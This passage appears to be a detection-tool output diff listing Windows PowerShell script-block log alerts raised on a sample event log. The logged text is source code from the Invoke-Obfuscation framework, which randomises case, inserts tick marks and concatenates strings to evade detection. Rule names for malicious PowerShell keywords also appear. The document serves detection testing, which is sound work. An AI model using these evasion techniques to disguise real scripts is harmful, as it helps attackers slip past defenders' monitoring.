will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"on was used. If($ObfuscatedSubToken -eq $PreObfuscatedSubToken) { # Same, so don't encapsulate. And maybe take off trailing whitespace? } ElseIf($ObfuscatedSubToken.ToLower().Contains(""replace"")) { $ObfuscatedToken += ( '(' + $ObfuscatedSubToken + ')' + '+' ) } Else { $ObfuscatedToken += ($ObfuscatedSubToken + '+' ) } } # Trim extra whitespace and trailing + from $ObfuscatedToken. $ObfuscatedToken = $ObfuscatedToken.Trim(' + ') } Else { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # The encapsulation will occur later in the function. At this point we're just setting the boolean variable $EncapsulateAsScriptBlockInsteadOfParentheses. # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] $SubStringStart = 30 If($Token.Start -lt $SubStringStart) { $SubStringStart = $Token.Start } $SubString = $ScriptString.SubString($Token.Start-$SubStringStart,$SubStringStart).ToLower() If($SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { $EncapsulateAsScriptBlockInsteadOfParentheses = $TRUE } If($SubString.Contains('parametersetname') -AND !$SubString.Contains('defaultparametersetname') -AND $SubString.Contains('=')) { # For strings in ParameterSetName parameter binding (but not DefaultParameterSetName) then we will only obfuscate with tick marks. # Otherwise we may get errors depending on the version of PowerShell being run. $ObfuscatedToken = $Token.Content $TokenForTicks = [System.Management.Automation.PSParser]::Tokenize($ObfuscatedToken,[ref]$null) $ObfuscatedToken = '""' + (Out-ObfuscatedWithTicks $ObfuscatedToken $TokenForTicks[0]) + '""' } Else { # User input $ObfuscationLevel (1-2) will choose between concatenating String token value string or reordering it with the -f format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Token Obfuscation.""; Exit} } } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } } # Encapsulate concatenated string with parentheses to avoid garbled string in scenarios like Write-* methods. If($ObfuscatedToken.Length -ne ($TokenContent.Length + 2)) { # For Parameter Binding the value has to either be plain concatenation or must be a scriptblock in which case we will encapsulate with {} instead of (). # Actual error that led to this is: ""Attribute argument must be a constant or a script block."" # ALLOWED :: [CmdletBinding(DefaultParameterSetName={""{1}{0}{2}""-f'd','DumpCre','s'})] # NOT ALLOWED :: [CmdletBinding(DefaultParameterSetName=(""{1}{0}{2}""-f'd','DumpCre','s'))] If($EncapsulateAsScriptBlockInsteadOfParentheses) { $ObfuscatedToken = '{' + $ObfuscatedToken + '}' } ElseIf(($ObfuscatedToken.Length -eq $TokenContent.Length + 5) -AND $ObfuscatedToken.SubString(2,$ObfuscatedToken.Length-4) -eq ($TokenContent + ' ')) { $ObfuscatedToken = $TokenContent } ElseIf($ObfuscatedToken.StartsWith('""') -AND $ObfuscatedToken.EndsWith('""') -AND !$ObfuscatedToken.Contains('+') -AND !$ObfuscatedToken.Contains('-f')) { # No encapsulation is needed for string obfuscation that is only double quotes and tick marks for ParameterSetName (and not DefaultParameterSetName). $ObfuscatedToken = $ObfuscatedToken } ElseIf($ObfuscatedToken.Length -ne $TokenContent.Length + 2) { $ObfuscatedToken = '(' + $ObfuscatedToken + ')' } } # Remove redundant blank string concatenations introduced by special use case of $ inside double quotes. If($ObfuscatedToken.EndsWith(""+''"") -OR $ObfuscatedToken.EndsWith('+""""')) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } # Handle dangling ticks from string concatenation where a substring ends in a tick. Move this tick to the beginning of the following substring. If($ObfuscatedToken.Contains('`')) { If($ObfuscatedToken.Contains('`""+""')) { $ObfuscatedToken = $ObfuscatedToken.Replace('`""+""','""+""`') } If($ObfuscatedToken.Contains(""``'+'"")) { $ObfuscatedToken = $ObfuscatedToken.Replace(""``'+'"",""'+'``"") } } # Add the obfuscated token back to $ScriptString. # If string is preceded by a . or :: and followed by ( then it is a Member token encapsulated by quotes and now treated as a string. # We must add a .Invoke to the concatenated Member string to avoid syntax errors. If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::')) -AND ($ScriptString.SubString($Token.Start+$Token.Length,1) -eq '(')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + '.Invoke' + $ScriptString.SubString($Token.Start+$Token.Length) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) } Return $ScriptString } Function Out-ObfuscatedCommandTokenLevel2 { <# .SYNOPSIS Obfuscates command token by converting it to a concatenated string and using splatting to invoke the command. Invoke-Obfuscation Function: Out-ObfuscatedCommandTokenLevel2 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandTokenLevel2 obfuscates a given command token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the splatted Command token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &('Wr'+'itE-'+'HOSt') 'Hello World!' -ForegroundColor Green; .('WrITe-Ho'+'s'+'t') 'Obfuscation Rocks!' -ForegroundColor Green C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandTokenLevel2 $ScriptString $Token 1} C:\PS> $ScriptString &(""{1}{0}{2}""-f'h','wRiTE-','ost') 'Hello World!' -ForegroundColor Green; .(""{2}{1}{0}"" -f'ost','-h','wrIte') 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $ObfuscatedToken = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Command token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Command Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Check if the command is already prepended with an invocation operator. If it is then do not add an invocation operator. # E.g. & powershell -Sta -Command $cmd # E.g. https://github.com/adaptivethreat/Empire/blob/master/data/module_source/situational_awareness/host/Invoke-WinEnum.ps1#L139 $SubStringLength = 15 If($Token.Start -lt $SubStringLength) { $SubStringLength = $Token.Start } # Extract substring leading up to the current token. $SubString = $ScriptString.SubString($Token.Start-$SubStringLength,$SubStringLength).Trim() # Set $InvokeOperatorAlreadyPresent boolean variable to TRUE if the substring ends with invocation operators . or & $InvokeOperatorAlreadyPresent = $FALSE If($SubString.EndsWith('.') -OR $SubString.EndsWith('&')) { $InvokeOperatorAlreadyPresent = $TRUE } If(!$InvokeOperatorAlreadyPresent) { # Randomly choose between the & and . Invoke Operators. # In certain large scripts where more than one parameter are being passed into a custom function # (like Add-SignedIntAsUnsigned in Invoke-Mimikatz.ps1) then using . will cause errors but & will not. # For now we will default to only & if $ScriptString.Length -gt 10000 If($ScriptString.Length -gt 10000) {$RandomInvokeOperator = '&'} Else {$RandomInvokeOperator = Get-Random -InputObject @('&','.')} # Add invoke operator (and potentially whitespace) to complete splatting command. $ObfuscatedToken = $RandomInvokeOperator + $ObfuscatedToken } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedWithTicks { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and randomly adding ticks. It takes PowerShell special characters into account so you will get `N instead of `n, `T instead of `t, etc. Invoke-Obfuscation Function: Out-ObfuscatedWithTicks Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedWithTicks obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Command'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} C:\PS> $ScriptString WrI`Te-Ho`sT 'Hello World!' -ForegroundColor Green; WrIte-`hO`S`T 'Obfuscation Rocks!' -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # If ticks are already present in current Token then Return $ScriptString as is. If($Token.Content.Contains('`')) { Return $ScriptString } # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # Set boolean variable to encapsulate member with double quotes if it is setting a value like below. # E.g. New-Object PSObject -Property @{ ""P`AY`LOaDS"" = $Payload } $EncapsulateWithDoubleQuotes = $FALSE If($ScriptString.SubString(0,$Token.Start).Contains('@{') -AND ($ScriptString.SubString($Token.Start+$Token.Length).Trim()[0] -eq '=')) { $EncapsulateWithDoubleQuotes = $TRUE } # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Choose a random percentage of characters to obfuscate with ticks in current token. $ObfuscationPercent = Get-Random -Minimum 15 -Maximum 30 # Convert $ObfuscationPercent to the exact number of characters to obfuscate in the current token. $NumberOfCharsToObfuscate = [int]($Token.Length*($ObfuscationPercent/100)) # Guarantee that at least one character will be obfuscated. If($NumberOfCharsToObfuscate -eq 0) {$NumberOfCharsToObfuscate = 1} # Select random character indexes to obfuscate with ticks (excluding first and last character in current token). $CharIndexesToObfuscate = (Get-Random -InputObject (1..($TokenArray.Length-2)) -Count $NumberOfCharsToObfuscate) # Special characters in PowerShell must be upper-cased before adding a tick before the character. $SpecialCharacters = @('a','b','f','n','r','t','v') # Remove the possibility of a single tick being placed only before the token string. # This would leave the string value completely intact, thus defeating the purpose of the tick obfuscation. $ObfuscatedToken = '' #$NULL $ObfuscatedToken += $TokenArray[0] For($i=1; $i -le $TokenArray.Length-1; $i++) { $CurrentChar = $TokenArray[$i] If($CharIndexesToObfuscate -Contains $i) { # Set current character to upper case in case it is in $SpecialCharacters (i.e., `N instead of `n so it's not treated as a newline special character) If($SpecialCharacters -Contains $CurrentChar) {$CurrentChar = ([string]$CurrentChar).ToUpper()} # Skip adding a tick if character is a special character where case does not apply. If($CurrentChar -eq '0') {$ObfuscatedToken += $CurrentChar; Continue} # Add tick. $ObfuscatedToken += '`' + $CurrentChar } Else { $ObfuscatedToken += $CurrentChar } } # If $Token immediately follows a . or :: (and does not begin $ScriptString) then encapsulate with double quotes so ticks are valid. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } ElseIf($EncapsulateWithDoubleQuotes) { # Encapsulate the obfuscated token with double quotes since ticks were introduced. $ObfuscatedToken = '""' + $ObfuscatedToken + '""' } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedMemberTokenLevel3 { <# .SYNOPSIS Obfuscates member token by randomizing its case, randomly concatenating the member as a string and adding the .invoke operator. This enables us to treat a member token as a string to gain the obfuscation benefits of a string. Invoke-Obfuscation Function: Out-ObfuscatedMemberTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in 